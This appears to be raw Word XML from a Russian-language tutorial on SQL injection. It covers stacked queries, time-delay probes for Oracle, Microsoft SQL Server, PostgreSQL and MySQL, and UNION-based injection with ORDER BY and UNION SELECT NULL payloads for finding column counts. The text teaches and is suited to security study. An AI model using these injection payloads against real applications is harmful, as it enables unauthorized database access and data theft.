    <w:p w14:paraId="0206CEFD" w14:textId="5A3F6F43" w:rsidR="00BD08D8" w:rsidRPr="00BD08D8" w:rsidRDefault="00BD08D8" w:rsidP="00BD08D8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F5A5BCE" w14:textId="026E4353" w:rsidR="00BD08D8" w:rsidRPr="00BD08D8" w:rsidRDefault="00BD08D8" w:rsidP="00BD08D8">
      <w:r w:rsidRPr="00BD08D8">
        <w:t>Пакетные (или стековые) запросы</w:t>
      </w:r>
      <w:r w:rsidR="00194A63">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00BD08D8">
        <w:t>Возможность выполнять несколько запросов последовательно.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6880B35E" w14:textId="77777777" w:rsidR="00BD08D8" w:rsidRPr="00BD08D8" w:rsidRDefault="00BD08D8" w:rsidP="00BD08D8">
      <w:p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Microsoft, PostgreSQL, MySQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD08D8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E9C55C0" w14:textId="58F7BE2D" w:rsidR="00BD08D8" w:rsidRPr="00BD08D8" w:rsidRDefault="00BD08D8" w:rsidP="00194A63">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BD08D8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QUERY</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD08D8">
        <w:rPr>
          <w:rStyle w:val="hljs-number"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-1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>HERE; QUERY</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD08D8">
        <w:rPr>
          <w:rStyle w:val="hljs-number"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-2</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD08D8">
        <w:rPr>
          <w:rStyle w:val="hljs-operator"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD08D8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>HERE;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13708E67" w14:textId="77777777" w:rsidR="00BD08D8" w:rsidRPr="00BD08D8" w:rsidRDefault="00BD08D8" w:rsidP="00BD08D8"/>
    <w:p w14:paraId="076A9634" w14:textId="14C1006B" w:rsidR="00BD08D8" w:rsidRPr="00BD08D8" w:rsidRDefault="00BD08D8" w:rsidP="00BD08D8">
      <w:r w:rsidRPr="00BD08D8">
        <w:t>Задержка выполнения</w:t>
      </w:r>
      <w:r w:rsidR="00194A63">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00BD08D8">
        <w:t>Вы можете вызвать задержку обработки запроса, чтобы проверить уязвимость.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F1108A9" w14:textId="77777777" w:rsidR="00BD08D8" w:rsidRPr="00BD08D8" w:rsidRDefault="00BD08D8" w:rsidP="00BD08D8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BD08D8">
        <w:rPr>
          <w:rStyle w:val="af"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Oracle</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD08D8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dbms_pipe.receive_message(('a'),10)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B85F59A" w14:textId="77777777" w:rsidR="00BD08D8" w:rsidRPr="00BD08D8" w:rsidRDefault="00BD08D8" w:rsidP="00BD08D8">
      <w:r w:rsidRPr="00BD08D8">
        <w:rPr>
          <w:rStyle w:val="af"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Microsoft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WAITFOR DELAY '0:0:10'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D2C0B13" w14:textId="77777777" w:rsidR="00BD08D8" w:rsidRPr="00BD08D8" w:rsidRDefault="00BD08D8" w:rsidP="00BD08D8">
      <w:r w:rsidRPr="00BD08D8">
        <w:rPr>
          <w:rStyle w:val="af"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>PostgreSQL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SELECT pg_sleep(10)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DB185FB" w14:textId="77777777" w:rsidR="00BD08D8" w:rsidRPr="00BD08D8" w:rsidRDefault="00BD08D8" w:rsidP="00BD08D8">
      <w:r w:rsidRPr="00BD08D8">
        <w:rPr>
          <w:rStyle w:val="af"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>MySQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD08D8">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00BD08D8">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>SELECT SLEEP(10)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33479785" w14:textId="3D0D9846" w:rsidR="00BD08D8" w:rsidRDefault="00BD08D8" w:rsidP="00CB262C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68C11C72" w14:textId="77777777" w:rsidR="00E14271" w:rsidRPr="00E14271" w:rsidRDefault="00E14271" w:rsidP="00E14271">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="_Toc182315626"/>
      <w:r w:rsidRPr="00E14271">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">2.7 </w:t>
      </w:r>
      <w:r w:rsidRPr="00E14271">
        <w:t>SQL-инъекция с использованием UNION</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
    </w:p>
    <w:p w14:paraId="536D37F3" w14:textId="77777777" w:rsidR="00E14271" w:rsidRPr="00E14271" w:rsidRDefault="00E14271" w:rsidP="00E14271">
      <w:r w:rsidRPr="00E14271">
        <w:t xml:space="preserve">Когда приложение уязвимо к SQL-инъекциям, и результаты запроса отображаются в ответах приложения, злоумышленники могут использовать ключевое слово </w:t>
      </w:r>
      <w:r w:rsidRPr="00E14271">
        <w:rPr>
          <w:rStyle w:val="af"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>UNION</w:t>
      </w:r>
      <w:r w:rsidRPr="00E14271">
        <w:t xml:space="preserve"> для получения данных из других таблиц базы данных. Этот вид атаки известен как SQL-инъекция с использованием UNION.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20084CC1" w14:textId="77777777" w:rsidR="00E14271" w:rsidRPr="00E14271" w:rsidRDefault="00E14271" w:rsidP="00E14271">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E14271">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Ключевое слово </w:t>
      </w:r>
      <w:r w:rsidRPr="00E14271">
        <w:rPr>
          <w:rStyle w:val="af"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>UNION</w:t>
      </w:r>
      <w:r w:rsidRPr="00E14271">
        <w:t xml:space="preserve"> позволяет выполнять один или несколько дополнительных </w:t>
      </w:r>
      <w:r w:rsidRPr="00E14271">
        <w:rPr>
          <w:rStyle w:val="af"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>SELECT</w:t>
      </w:r>
      <w:r w:rsidRPr="00E14271">
        <w:t>-запросов и объединять их результаты с исходным запросом. Например</w:t>
      </w:r>
      <w:r w:rsidRPr="00E14271">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D978CF2" w14:textId="7E979D07" w:rsidR="00E14271" w:rsidRPr="00E14271" w:rsidRDefault="00E14271" w:rsidP="00E14271">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E14271">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SELECT</w:t>
      </w:r>
      <w:r w:rsidRPr="00E14271">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> a, b </w:t>
      </w:r>
      <w:r w:rsidRPr="00E14271">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>FROM</w:t>
      </w:r>
      <w:r w:rsidRPr="00E14271">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> table1 </w:t>
      </w:r>
      <w:r w:rsidRPr="00E14271">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>UNION</w:t>
      </w:r>
      <w:r w:rsidRPr="00E14271">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E14271">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SELECT</w:t>
      </w:r>
      <w:r w:rsidRPr="00E14271">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> c, d </w:t>
      </w:r>
      <w:r w:rsidRPr="00E14271">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>FROM</w:t>
      </w:r>
      <w:r w:rsidRPr="00E14271">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> table2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="306CDD46" w14:textId="77777777" w:rsidR="00E14271" w:rsidRPr="00E14271" w:rsidRDefault="00E14271" w:rsidP="00E14271">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E14271">
        <w:t xml:space="preserve">Этот запрос объединяет два набора результатов, выводя значения из колонок </w:t>
      </w:r>
      <w:r w:rsidRPr="00E14271">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidRPr="00E14271">
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r w:rsidRPr="00E14271">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>b</w:t>
      </w:r>
      <w:r w:rsidRPr="00E14271">
        <w:t xml:space="preserve"> таблицы </w:t>
      </w:r>
      <w:r w:rsidRPr="00E14271">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>table1</w:t>
      </w:r>
      <w:r w:rsidRPr="00E14271">
        <w:t xml:space="preserve"> и из колонок </w:t>
      </w:r>
      <w:r w:rsidRPr="00E14271">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r w:rsidRPr="00E14271">
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r w:rsidRPr="00E14271">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:r w:rsidRPr="00E14271">
        <w:t xml:space="preserve"> таблицы </w:t>
      </w:r>
      <w:r w:rsidRPr="00E14271">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>table2</w:t>
      </w:r>
      <w:r w:rsidRPr="00E14271">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B718B70" w14:textId="77777777" w:rsidR="00E14271" w:rsidRPr="00E14271" w:rsidRDefault="00E14271" w:rsidP="00E14271">
      <w:r w:rsidRPr="00E14271">
        <w:t>Условия успешного выполнения запроса с UNION:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DFF2CB1" w14:textId="77777777" w:rsidR="00E14271" w:rsidRPr="00E14271" w:rsidRDefault="00E14271" w:rsidP="00E14271">
      <w:r w:rsidRPr="00E14271">
        <w:t>Все объединяемые запросы должны возвращать одинаковое количество столбцов.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31625672" w14:textId="77777777" w:rsidR="00E14271" w:rsidRPr="00E14271" w:rsidRDefault="00E14271" w:rsidP="00E14271">
      <w:r w:rsidRPr="00E14271">
        <w:t>Типы данных в столбцах должны быть совместимы.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="249B2C95" w14:textId="77777777" w:rsidR="00E14271" w:rsidRPr="00E14271" w:rsidRDefault="00E14271" w:rsidP="00E14271">
      <w:r w:rsidRPr="00E14271">
        <w:t>Чтобы выполнить атаку SQL-инъекции с использованием UNION, необходимо убедиться, что эти условия выполнены. Обычно это включает:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="700A0972" w14:textId="77777777" w:rsidR="00E14271" w:rsidRPr="00E14271" w:rsidRDefault="00E14271" w:rsidP="00E14271">
      <w:r w:rsidRPr="00E14271">
        <w:t>Определение количества столбцов, возвращаемых исходным запросом.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C1958E5" w14:textId="77777777" w:rsidR="00E14271" w:rsidRPr="00E14271" w:rsidRDefault="00E14271" w:rsidP="00E14271">
      <w:r w:rsidRPr="00E14271">
        <w:t>Поиск столбцов с подходящими типами данных, которые могут содержать результаты внедренного запроса.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0374140C" w14:textId="77777777" w:rsidR="00E14271" w:rsidRPr="00E14271" w:rsidRDefault="00E14271" w:rsidP="00E14271">
      <w:r w:rsidRPr="00E14271">
        <w:t>Определение количества столбцов</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1731D572" w14:textId="77777777" w:rsidR="00E14271" w:rsidRPr="00E14271" w:rsidRDefault="00E14271" w:rsidP="00E14271">
      <w:r w:rsidRPr="00E14271">
        <w:t>Для атаки можно использовать два эффективных метода:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DD63C05" w14:textId="77777777" w:rsidR="00E14271" w:rsidRPr="00E14271" w:rsidRDefault="00E14271" w:rsidP="00E14271">
      <w:r w:rsidRPr="00E14271">
        <w:rPr>
          <w:rStyle w:val="af"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Метод с использованием ORDER BY</w:t>
      </w:r>
      <w:r w:rsidRPr="00E14271">
        <w:t xml:space="preserve">. Внедряйте последовательность операторов </w:t>
      </w:r>
      <w:r w:rsidRPr="00E14271">
        <w:rPr>
          <w:rStyle w:val="af"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>ORDER BY</w:t>
      </w:r>
      <w:r w:rsidRPr="00E14271">
        <w:t xml:space="preserve">, увеличивая индекс столбца до возникновения ошибки. Например, если точка инъекции находится в строке внутри условия </w:t>
      </w:r>
      <w:r w:rsidRPr="00E14271">
        <w:rPr>
          <w:rStyle w:val="af"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>WHERE</w:t>
      </w:r>
      <w:r w:rsidRPr="00E14271">
        <w:t xml:space="preserve"> исходного запроса, вводите:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="740F54AE" w14:textId="77777777" w:rsidR="00E14271" w:rsidRPr="00E14271" w:rsidRDefault="00E14271" w:rsidP="00E14271">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E14271">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r w:rsidRPr="00E14271">
        <w:rPr>
          <w:rStyle w:val="hljs-attribute"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ORDER</w:t>
      </w:r>
      <w:r w:rsidRPr="00E14271">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> BY </w:t>
      </w:r>
      <w:r w:rsidRPr="00E14271">
        <w:rPr>
          <w:rStyle w:val="hljs-number"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00E14271">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">-- ' </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="613C1A1E" w14:textId="77777777" w:rsidR="00E14271" w:rsidRPr="00E14271" w:rsidRDefault="00E14271" w:rsidP="00E14271">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E14271">
        <w:rPr>
          <w:rStyle w:val="hljs-attribute"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ORDER</w:t>
      </w:r>
      <w:r w:rsidRPr="00E14271">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> BY </w:t>
      </w:r>
      <w:r w:rsidRPr="00E14271">
        <w:rPr>
          <w:rStyle w:val="hljs-number"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00E14271">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">-- ' </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22051988" w14:textId="01A8DD5F" w:rsidR="00E14271" w:rsidRPr="00E14271" w:rsidRDefault="00E14271" w:rsidP="00E14271">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E14271">
        <w:rPr>
          <w:rStyle w:val="hljs-attribute"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ORDER</w:t>
      </w:r>
      <w:r w:rsidRPr="00E14271">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E14271">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>BY</w:t>
      </w:r>
      <w:r w:rsidRPr="00E14271">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E14271">
        <w:rPr>
          <w:rStyle w:val="hljs-number"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00E14271">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>—</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19701FA3" w14:textId="46412787" w:rsidR="00E14271" w:rsidRPr="00E14271" w:rsidRDefault="00E14271" w:rsidP="00E14271">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E14271">
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidRPr="00E14271">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E14271">
        <w:t>так</w:t>
      </w:r>
      <w:r w:rsidRPr="00E14271">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E14271">
        <w:t>далее</w:t>
      </w:r>
      <w:r w:rsidRPr="00E14271">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C9651B7" w14:textId="28D29E60" w:rsidR="00E14271" w:rsidRPr="00E14271" w:rsidRDefault="00E14271" w:rsidP="00E14271">
      <w:r w:rsidRPr="00E14271">
        <w:t>Это изменяет исходный запрос, упорядочивая результаты по разным столбцам. Когда указанный индекс столбца превышает фактическое количество столбцов в результате, база данных возвращает ошибку, например</w:t>
      </w:r>
      <w:r w:rsidRPr="00E14271">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E14271">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">позиционный </w:t>
      </w:r>
      <w:r w:rsidRPr="00E14271">
        <w:t xml:space="preserve">номер </w:t>
      </w:r>
      <w:r w:rsidRPr="00E14271">
        <w:rPr>
          <w:rStyle w:val="hljs-number"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00E14271">
        <w:t xml:space="preserve"> в </w:t>
      </w:r>
      <w:r w:rsidRPr="00E14271">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
        </w:rPr>
        <w:t>ORDER</w:t>
      </w:r>
      <w:r w:rsidRPr="00E14271">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E14271">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
        </w:rPr>
        <w:t>BY</w:t>
      </w:r>
      <w:r w:rsidRPr="00E14271">
        <w:t xml:space="preserve"> вне диапазона количества элементов в списке </w:t>
      </w:r>
      <w:r w:rsidRPr="00E14271">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
        </w:rPr>
        <w:t>SELECT</w:t>
      </w:r>
      <w:r w:rsidRPr="00E14271">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CFF6A3F" w14:textId="58D1610F" w:rsidR="00E14271" w:rsidRPr="00E14271" w:rsidRDefault="00E14271" w:rsidP="00E14271">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E14271">
        <w:t>Ответ приложения может содержать ошибку базы данных, общий ответ об ошибке или просто отсутствие результатов. Любое различие в ответе позволяет определить количество столбцов.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D9BC814" w14:textId="5C914EF6" w:rsidR="00E14271" w:rsidRPr="00E14271" w:rsidRDefault="00E14271" w:rsidP="00E14271">
      <w:r w:rsidRPr="00E14271">
        <w:rPr>
          <w:rStyle w:val="af"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Метод с использованием UNION SELECT</w:t>
      </w:r>
      <w:r w:rsidRPr="00E14271">
        <w:t xml:space="preserve">. Внедряйте последовательные запросы </w:t>
      </w:r>
      <w:r w:rsidRPr="00E14271">
        <w:rPr>
          <w:rStyle w:val="af"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>UNION SELECT</w:t>
      </w:r>
      <w:r w:rsidRPr="00E14271">
        <w:t xml:space="preserve">, указывая разное количество значений </w:t>
      </w:r>
      <w:r w:rsidRPr="00E14271">
        <w:rPr>
          <w:rStyle w:val="af"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>NULL</w:t>
      </w:r>
      <w:r w:rsidRPr="00E14271">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DA665C4" w14:textId="2365DAFB" w:rsidR="00E14271" w:rsidRPr="00E14271" w:rsidRDefault="00E14271" w:rsidP="00E14271">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E14271">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r w:rsidRPr="00E14271">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>UNION</w:t>
      </w:r>
      <w:r w:rsidRPr="00E14271">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> SELECT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>—</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18932F6C" w14:textId="4466B970" w:rsidR="00E14271" w:rsidRPr="00E14271" w:rsidRDefault="00E14271" w:rsidP="00E14271">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E14271">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r w:rsidRPr="00E14271">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>UNION</w:t>
      </w:r>
      <w:r w:rsidRPr="00E14271">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> SELECT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 xml:space="preserve">,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>—</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A72A724" w14:textId="78DBC7F6" w:rsidR="00E14271" w:rsidRPr="00E14271" w:rsidRDefault="00E14271" w:rsidP="00E14271">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E14271">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> ' </w:t>
      </w:r>
      <w:r w:rsidRPr="00E14271">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>UNION</w:t>
      </w:r>
      <w:r w:rsidRPr="00E14271">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> SELECT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 xml:space="preserve">,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 xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00E14271">
        <w:rPr>
          <w:rStyle w:val="hljs-literal"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>NULL</w:t>
      </w:r>
      <w:r w:rsidRPr="00E14271">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>—</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D8F0C28" w14:textId="33E4C552" w:rsidR="00E14271" w:rsidRPr="00E14271" w:rsidRDefault="00E14271" w:rsidP="00E14271">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E14271">
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidRPr="00E14271">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E14271">
        <w:t>так</w:t>
      </w:r>
      <w:r w:rsidRPr="00E14271">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E14271">
        <w:t>далее</w:t>
      </w:r>
      <w:r w:rsidRPr="00E14271">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
